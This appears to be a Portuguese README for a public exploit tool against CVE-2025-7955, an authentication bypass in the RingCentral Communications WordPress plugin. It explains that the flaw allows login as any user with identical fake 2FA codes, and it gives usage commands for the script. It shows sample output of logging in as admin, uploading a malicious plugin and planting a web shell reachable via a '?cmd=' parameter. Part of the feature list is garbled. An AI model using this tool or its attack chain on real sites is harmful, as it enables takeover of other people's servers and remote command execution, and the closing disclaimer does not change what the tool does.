
RingCentral Communications 1.5 - 1.6.8 - Falta de verificação do lado do servidor para bypass de autenticação através da função ringcentral_admin_login_2fa_verify
RingCentral Communications 1.5 - 1.6.8 - Falta de Verificação no Lado do Servidor para Bypass de Autenticação via Função ringcentral_admin_login_2fa_verify
CVE: CVE-2025-7955
Plugin Afetado: RingCentral Communications (WordPress)
Versões Afetadas: 1.5 – 1.6.8
Pontuação CVSS: 9.8 (Crítico)
Tipo: Bypass de Autenticação (Falta de Verificação no Lado do Servidor)
O plugin RingCentral Communications para WordPress é vulnerável a um Bypass de Autenticação devido a validação inadequada dentro da função
ringcentral_admin_login_2fa_verify(). As versões 1.5 a 1.6.8 permitem que atacantes não autenticados façam login como qualquer usuário simplesmente fornecendo códigos falsos idênticos.
Este exploit automatiza toda a cadeia de ataque para CVE-2025-7955. Ele foi projetado para:
/wp-json/wp/v2/users/ID).whoami através do shell e imprime a saída.Prepare seu plugin malicioso
Certifique-se de ter seu arquivo ZIP do plugin malicioso (padrão: Nxploit.zip) no mesmo diretório do script.
Execute o exploit:
python3 CVE-2025-7955.py -u http://target/wordpress [-user admin] [-id 1] [-z Nxploit.zip]
-u, --url : (obrigatório) URL do site WordPress alvo-user, --username : (opcional) Nome de usuário para fazer login (descoberto automaticamente se omitido)-id, --id_admin : (padrão: 1) ID do usuário (admin geralmente é ID 1)-z, --zip : (padrão: Nxploit.zip) Caminho para o ZIP do plugin maliciosoExemplo:
python3 CVE-2025-7955.py -u http://target/wordpress
888b 888 888 d8b 888 888
8888b 888 888 Y8P 888 888
88888b 888 888 888 888
888Y88b 888 888 888 88888b. 888 .d88b. 888 888888 .d88b. .d88888
888 Y88b888 `Y8bd8P' 888 "88b 888 d88""88b 888 888 d8P Y8b d88" 888
888 Y88888 X88K 888 888 888 888 888 888 888 88888888 888 888
888 Y8888 .d8""8b. 888 d88P 888 Y88..88P 888 Y88b. Y8b. Y88b 888
888 Y888 888 888 88888P" 888 "Y88P" 888 "Y888 "Y8888 "Y88888
888
888
888
CVE-2025-7955 Exploit por: Nxploited
[*] Usando User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[*] Tentando login como: admin (ID: 1)
[+] Login bem-sucedido!
[+] Nonce: 661e57f2e4
[*] Enviando plugin malicioso...
[+] Plugin enviado com sucesso!
[*] Executando: whoami
----------------------------------------
daemon
----------------------------------------
[+] Shell: http://target/wordpress/wp-content/plugins/Nxploit/index.php?cmd=COMMAND
Esta ferramenta é apenas para testes de segurança autorizados e uso educacional.
O uso não autorizado contra sistemas que você não possui ou não tem permissão explícita para testar é ilegal e antiético.
O autor não assume nenhuma responsabilidade por qualquer uso indevido ou danos causados por este script.
Por: Khaled Alenazi (Nxploited)
ou especifique nome de usuário/ID:
python3 CVE-2025-7955.py -u http://target/wordpress -user admin -id 1